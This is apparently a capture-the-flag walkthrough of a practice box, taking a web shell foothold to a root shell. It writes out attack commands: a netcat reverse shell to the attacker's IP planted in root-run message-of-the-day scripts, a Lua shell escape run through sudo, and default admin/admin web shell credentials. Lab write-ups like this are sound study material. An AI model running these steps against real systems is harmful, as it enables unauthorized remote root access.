Edit: Because of a move to a new server, the image files for this article are missing.
Initial Foothold:
As usual, the first thing to do when starting on a new box is to run a scan and see what we have to work with.

As you can see from the image above, we have two ports open: port 22 (SSH) and port 80 (HTTP). Let's take a look at what port 80 has to offer.

It looks like a web page without any links. My next step was to check the source code of the page.

From this we can take away that a backdoor has been left open and that the hacker's name is Xh4H. So, Google here I come. Google led me to a Twitter post, which in turn led me to a GitHub repository with a bunch of web shells. While going through the repo I noticed the text in the README.md file: it is exactly the text the hacker left on the page. So I started testing all of the shells until I finally found the right one. The link to the git repo can be found below.
https://github.com/TheBinitGhimire/Web-Shells

You will be prompted to log in, but our fellow hacker used pretty easy credentials:
User: admin
Password: admin
After login we are presented with a web shell.

I personally don't like web shells, so I decided to get a reverse shell. There are several ways to achieve that: you can use the "Code Injection" tab, or you can use the "Network" tab. I took the second option. On my Kali machine I started a listener with nc -nlvp 4444, then in the Network tab I entered my VPN IP (and port 4444, to match the listener), chose perl and ran it.

The next step was to check which user I am on the system with this reverse shell.

User:
OK, so I am webadmin. My next step is to go to /home and then into the webadmin folder, since it makes sense that I would have access to that one. Checking the folder, there is only one file inside, called note.txt. Opening it shows a small note which mentions something called Lua. I had never heard of it, so I googled it.

It is also usually worth running "sudo -l" to see what webadmin is allowed to run through sudo.

The image above shows that I can run something called luvit. That prompted more googling to understand what's going on. Here is a link if you are interested in what Luvit is: https://luvit.io/ (in short, it is a Lua runtime built on libuv, so anything Lua can do, luvit can do).
So now I needed to exploit that somehow. More googling led me to GTFOBins. The shell escape they list for lua is:
lua -e 'os.execute("/bin/sh")'
Since I am pointing luvit at a script file rather than passing code on the command line, a quick echo of the relevant part of that command into a file:
echo 'os.execute("/bin/bash");' > let.lua
After that, let's run it as sysadmin:
sudo -u sysadmin /home/sysadmin/luvit let.lua

Now navigate to /home/sysadmin to get the user flag. Done with user, so let's go for root.
If you get stuck, join our Discord. Even if you are not stuck, join and chat with like-minded people.
Root:
So, for root: run pspy64, then go to /etc/update-motd.d. There are several files in there that we can edit as sysadmin, and these scripts are executed as root when the message of the day is generated at login, which is what makes this worth our attention.

Add "/tmp/nc -e /bin/bash YOURIP 4545" to 91-release-upgrade before the if statement, so that it runs before the script can exit or exec on its own (note the path: this assumes a netcat build that supports -e has been placed in /tmp/nc, since the OpenBSD netcat shipped by default on many distributions lacks -e). Start another listener on your machine on port 4545, trigger a login, and here you go: a root shell.

